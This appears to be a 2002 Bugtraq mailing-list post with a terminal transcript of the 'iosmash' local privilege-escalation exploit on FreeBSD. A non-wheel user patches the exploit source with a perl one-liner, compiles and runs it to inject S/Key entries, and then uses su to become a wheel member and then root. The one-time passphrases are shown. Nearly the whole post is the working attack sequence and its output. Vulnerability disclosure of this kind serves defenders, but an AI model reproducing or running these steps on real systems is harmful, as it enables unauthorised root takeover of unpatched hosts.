full info on iosmash.c as non wheel user
From: John Scimone (jscimone@cc.gatech.edu)
Date: 04/24/02
From: John Scimone <jscimone@cc.gatech.edu> To: bugtraq@securityfocus.com Date: Tue, 23 Apr 2002 22:25:36 +0000
from phased....
I didn't think such would be necessary, but due to the high volume of emails it
has proved so. Below is a transcript of exploiting the stdio bug on FreeBSD as
a user not in the wheel group:
Welcome to FreeBSD!
> id
uid=1000(d0tslash) gid=1000(d0tslash) groups=1000(d0tslash)
>
> grep wheel /etc/group
wheel:*:0:root,akt0r-root,misterx
>
> perl -pi -e 's/root /misterx /g' iosmash.c
> gcc -o iosmash.c iosmash
>./iosmash
Adding d0tslash:
<--- HIT CTRL-C --->
> grep 98 iosmash.c
s/key 98 snosoft2
98: MASS OAT ROLL TOOL AGO CAM
"\nmisterx 0099 snosoft2 6f648e8bd0e2988a Apr 23,2666 01:02:03\n");
> su misterx
s/key 98 snosoft2
Password:MASS OAT ROLL TOOL AGO CAM
%pwd
/usr/home/d0tslash
%id
uid=1001(misterx) gid=1001(misterx) groups=1001(misterx), 0(wheel), 1006(cvsusers)
%cd ~
%grep "root " iosmash.c
decided to make a trivial exploit to easily get root :)
"\nroot 0099 snosoft2 6f648e8bd0e2988a Apr 23,2666 01:02:03\n");
%gcc -o iosmash iosmash.c
%./iosmash
Updating misterx:
Old key: snosoft2
<--- HIT CTRL-C --->
%su
s/key 98 snosoft2
Password:MASS OAT ROLL TOOL AGO CAM
xes#